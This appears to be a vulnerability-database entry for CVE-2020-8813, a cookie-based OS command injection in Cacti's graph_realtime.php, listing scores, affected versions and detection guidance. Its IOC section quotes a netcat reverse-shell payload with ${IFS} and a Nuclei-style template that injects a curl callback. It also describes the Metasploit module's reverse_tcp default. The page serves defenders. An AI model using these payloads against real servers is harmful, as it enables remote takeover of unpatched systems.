cbcvebase.
CVE-2020-8813
published 2020-02-22

CVE-2020-8813: graph_realtime.php in Cacti 1.2.8 allows remote attackers to execute arbitrary OS commands via shell metacharacters in a cookie, if a guest user has the graph…

PriorityP188high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
73.78%
99.4th percentile
graph_realtime.php in Cacti 1.2.8 allows remote attackers to execute arbitrary OS commands via shell metacharacters in a cookie, if a guest user has the graph real-time privilege.

Affected

11 ranges
VendorProductVersion rangeFixed in
cacticacti
cacticacti>= 0 < 1.2.10+ds1-11.2.10+ds1-1
cacticacti>= 0 < 1.2.10+ds1-11.2.10+ds1-1
cacticacti>= 0 < 1.2.10+ds1-11.2.10+ds1-1
cacticacti>= 0 < 1.2.10+ds1-11.2.10+ds1-1
debiancacti< cacti 1.2.10+ds1-1 (bookworm)cacti 1.2.10+ds1-1 (bookworm)
debiandebian_linux
fedoraprojectfedora
fedoraprojectfedora
fedoraprojectfedora
opmantekopen-audit

Detection & IOCsextracted from sources · hover to see the quote

path/graph_realtime.php?action=init
cookieCacti=<shell-metachar-payload>
command;nc${IFS}-e${IFS}/bin/bash${IFS}<ip>${IFS}<port>
url/graph_realtime.php?action=init
cookieCacti=%3Bcurl%20http%3A//<interactsh-url>
sigma
id: CVE-2020-8813
http:
- raw:
  - |
    GET /graph_realtime.php?action=init HTTP/1.1
    Host: {{Hostname}}
    Cookie: Cacti=%3Bcurl%20http%3A//{{interactsh-url}}
  • Monitor HTTP GET requests to /graph_realtime.php?action=init with a 'Cacti' cookie containing shell metacharacters (e.g., semicolons, ${IFS}, nc, bash).
  • Alert on the 'Cacti' cookie value containing URL-encoded shell injection patterns such as %3B (semicolon), %24%7BIFS%7D, or nc/bash references.
  • Detect POST requests to /user_admin.php enabling guest realtime graph permissions (section25=on, section7=on, tab=realms) as a precursor to exploitation.
  • Check for the string 'poller_realtime.php' in the response body of /graph_realtime.php?action=init as an indicator that the guest realtime feature is enabled and the target is vulnerable.
  • Use Shodan/FOFA queries for Cacti login pages (favicon hash -1797138069, title 'login to cacti') to identify exposed instances for proactive patching.
  • ·The unauthenticated RCE path requires the 'Guest Realtime Graphs' privilege to be enabled on the Cacti instance; exploitation is not possible if this setting is disabled.
  • ·The authenticated exploit variant first enables guest realtime permissions via /user_admin.php before sending the malicious cookie, meaning admin credentials are required for that attack path.
  • ·The Metasploit module defaults to port 443 with SSL and uses php/meterpreter/reverse_tcp as the default payload; detection rules should account for HTTPS traffic to the vulnerable endpoint.

CVSS provenance

nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
osv8.8HIGH
vulncheck8.8HIGH
vendor_debian8.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.